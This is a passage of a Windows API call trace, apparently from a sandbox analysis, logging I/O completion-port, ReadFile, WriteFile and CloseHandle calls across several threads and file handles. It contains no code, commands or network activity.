lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0159.085] ReadFile (in: hFile=0x194, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x29afdc8, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124, lpNumberOfBytesRead=0x29afdc8*=0x0, lpOverlapped=0x2b70020) returned 0x0 [0159.085] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 0 [0159.085] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0159.085] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0159.085] WriteFile (in: hFile=0x194, lpBuffer=0x2b70094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70094*, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x2b70020) returned 1 [0159.086] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0159.086] CloseHandle (hObject=0x194) returned 1 [0159.088] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2b70020) returned 1 [0159.091] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0159.417] ReadFile (in: hFile=0x194, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x29afdc8, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesRead=0x29afdc8*=0x0, lpOverlapped=0x2690020) returned 1 [0159.418] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0159.418] ReadFile (in: hFile=0x1c0, lpBuffer=0x3480124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x29afdc8, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124*, lpNumberOfBytesRead=0x29afdc8*=0x0, lpOverlapped=0x3480020) returned 1 [0159.419] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0159.419] ReadFile (in: hFile=0x1a0, lpBuffer=0x35a0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x29afdc8, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0124*, lpNumberOfBytesRead=0x29afdc8*=0x0, lpOverlapped=0x35a0020) returned 1 [0159.420] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0159.420] ReadFile (in: hFile=0x1a8, lpBuffer=0x36c0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x29afdc8, lpOverlapped=0x36c0020 | out: lpBuffer=0x36c0124*, lpNumberOfBytesRead=0x29afdc8*=0x0, lpOverlapped=0x36c0020) returned 1 [0159.421] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0159.421] ReadFile (in: hFile=0x1b8, lpBuffer=0x37e0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x29afdc8, lpOverlapped=0x37e0020 | out: lpBuffer=0x37e0124*, lpNumberOfBytesRead=0x29afdc8*=0x0, lpOverlapped=0x37e0020) returned 1 [0159.422] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0159.422] ReadFile (in: hFile=0x1c, lpBuffer=0x3900124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x29afdc8, lpOverlapped=0x3900020 | out: lpBuffer=0x3900124*, lpNumberOfBytesRead=0x29afdc8*=0x0, lpOverlapped=0x3900020) returned 1 [0159.422] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0159.423] ReadFile (in: hFile=0x1e0, lpBuffer=0x3a20124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x29afdc8, lpOverlapped=0x3a20020 | out: lpBuffer=0x3a20124*, lpNumberOfBytesRead=0x29afdc8*=0x0, lpOverlapped=0x3a20020) returned 1 [0159.423] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0159.423] WriteFile (in: hFile=0x194, lpBuffer=0x2690124*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x2690020) returned 1 [0159.429] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0159.429] WriteFile (in: hFile=0x1a0, lpBuffer=0x35a0124*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0124*, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x35a0020) returned 1 [0159.431] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0159.431] WriteFile (in: hFile=0x1c, lpBuffer=0x3900124*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x3900020 | out: lpBuffer=0x3900124*, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x3900020) returned 1 [0159.435] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0159.435] WriteFile (in: hFile=0x1a0, lpBuffer=0x35a0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0094*, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x35a0020) returned 1 [0159.440] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0159.441] WriteFile (in: hFile=0x1b8, lpBuffer=0x37e0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x37e0020 | out: lpBuffer=0x37e0094*, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x37e0020) returned 1 [0159.450] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0159.450] CloseHandle (hObject=0x1a8) returned 1 [0159.467] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x36c0020) returned 1 [0159.469] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0160.431] WriteFile (in: hFile=0x1c4, lpBuffer=0x3990124*, nNumberOfBytesToWrite=0x13305, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x3990020 | out: lpBuffer=0x3990124*, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x3990020) returned 1 [0160.438] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 0 [0160.459] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3510020) returned 1 [0160.459] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 0 [0160.459] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3630020) returned 1 [0160.459] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0160.459] WriteFile (in: hFile=0x1d4, lpBuffer=0x2b70094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70094*, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x2b70020) returned 1 [0160.461] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0160.462] WriteFile (in: hFile=0x1f4, lpBuffer=0x3630094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x3630020 | out: lpBuffer=0x3630094*, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x3630020) returned 1 [0160.468] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0160.469] WriteFile (in: hFile=0x198, lpBuffer=0x3ab0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x3ab0020 | out: lpBuffer=0x3ab0094*, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x3ab0020) returned 1 [0160.484] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 0 [0160.484] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3bd0020) returned 1 [0160.484] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0160.484] CloseHandle (hObject=0x1c) returned 1 [0160.527] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3510020) returned 1 [0160.529] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0160.536] CloseHandle (hObject=0x1c4) returned 1 [0160.548] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3990020) returned 1 [0160.551] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0168.666] ReadFile (in: hFile=0x1f0, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x29afdc8, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124, lpNumberOfBytesRead=0x29afdc8*=0x0, lpOverlapped=0x2b70020) returned 0x0 [0168.666] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0168.685] WriteFile (in: hFile=0x1d4, lpBuffer=0x3dd0124*, nNumberOfBytesToWrite=0x16d28, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x3dd0020 | out: lpBuffer=0x3dd0124*, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x3dd0020) returned 1 [0168.701] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0168.701] ReadFile (in: hFile=0x1a8, lpBuffer=0x3710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x29afdc8, lpOverlapped=0x3710020 | out: lpBuffer=0x3710124, lpNumberOfBytesRead=0x29afdc8*=0x0, lpOverlapped=0x3710020) returned 0x0 [0168.702] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 0 [0168.702] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0168.702] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0168.702] ReadFile (in: hFile=0x1ec, lpBuffer=0x3830124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x29afdc8, lpOverlapped=0x3830020 | out: lpBuffer=0x3830124, lpNumberOfBytesRead=0x29afdc8*=0x0, lpOverlapped=0x3830020) returned 0x0 [0168.702] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 0 [0168.702] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0168.702] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0168.702] ReadFile (in: hFile=0x1e4, lpBuffer=0x3950124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x29afdc8, lpOverlapped=0x3950020 | out: lpBuffer=0x3950124, lpNumberOfBytesRead=0x29afdc8*=0x0, lpOverlapped=0x3950020) returned 0x0 [0168.702] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0168.702] ReadFile (in: hFile=0x1c0, lpBuffer=0x3a70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x29afdc8, lpOverlapped=0x3a70020 | out: lpBuffer=0x3a70124, lpNumberOfBytesRead=0x29afdc8*=0x0, lpOverlapped=0x3a70020) returned 0x0 [0168.702] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0168.702] ReadFile (in: hFile=0x1c8, lpBuffer=0x3b90124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x29afdc8, lpOverlapped=0x3b90020 | out: lpBuffer=0x3b90124, lpNumberOfBytesRead=0x29afdc8*=0x0, lpOverlapped=0x3b90020) returned 0x0 [0168.702] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0168.702] ReadFile (in: hFile=0x1c, lpBuffer=0x3cb0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x29afdc8, lpOverlapped=0x3cb0020 | out: lpBuffer=0x3cb0124, lpNumberOfBytesRead=0x29afdc8*=0x0, lpOverlapped=0x3cb0020) returned 0x0 [0168.703] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0168.703] ReadFile (in: hFile=0x1d4, lpBuffer=0x3dd0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x29afdc8, lpOverlapped=0x3dd0020 | out: lpBuffer=0x3dd0124, lpNumberOfBytesRead=0x29afdc8*=0x0, lpOverlapped=0x3dd0020) returned 0x0 [0168.703] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 0 [0168.703] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3710020) returned 1 [0168.703] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0168.703] WriteFile (in: hFile=0x1b8, lpBuffer=0x710094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x710020 | out: lpBuffer=0x710094*, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x710020) returned 1 [0168.708] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0168.709] WriteFile (in: hFile=0x1c0, lpBuffer=0x3a70094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x3a70020 | out: lpBuffer=0x3a70094*, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x3a70020) returned 1 [0168.716] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0168.716] WriteFile (in: hFile=0x1d4, lpBuffer=0x3dd0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x3dd0020 | out: lpBuffer=0x3dd0094*, lpNumberOfBytesWritten=0x29afdc8, lpOverlapped=0x3dd0020) returned 1 [0168.760] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0168.775] CloseHandle (hObject=0x1e4) returned 1 [0168.796] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3950020) returned 1 [0168.799] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 [0168.799] CloseHandle (hObject=0x1c) returned 1 [0168.850] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3cb0020) returned 1 [0168.852] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29afdc8, lpCompletionKey=0x29afdc4, lpOverlapped=0x29afdcc) returned 1 Thread: id = 117 os_tid = 0xbcc [0148.850] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0155.983] CloseHandle (hObject=0x1e0) returned 1 [0155.989] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x36c0020) returned 1 [0155.992] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0156.325] ReadFile (in: hFile=0x1f0, lpBuffer=0x3a20124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x3a20020 | out: lpBuffer=0x3a20124*, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x3a20020) returned 1 [0156.326] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0156.329] ReadFile (in: hFile=0x1c0, lpBuffer=0x36c0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x36c0020 | out: lpBuffer=0x36c0124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x36c0020) returned 0x0 [0156.329] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0156.331] WriteFile (in: hFile=0x1a0, lpBuffer=0x3480094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3480020 | out: lpBuffer=0x3480094*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3480020) returned 1 [0156.352] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 0 [0156.354] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3900020) returned 1 [0156.354] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0156.355] CloseHandle (hObject=0x1d0) returned 1 [0156.374] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x35a0020) returned 1 [0156.376] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, 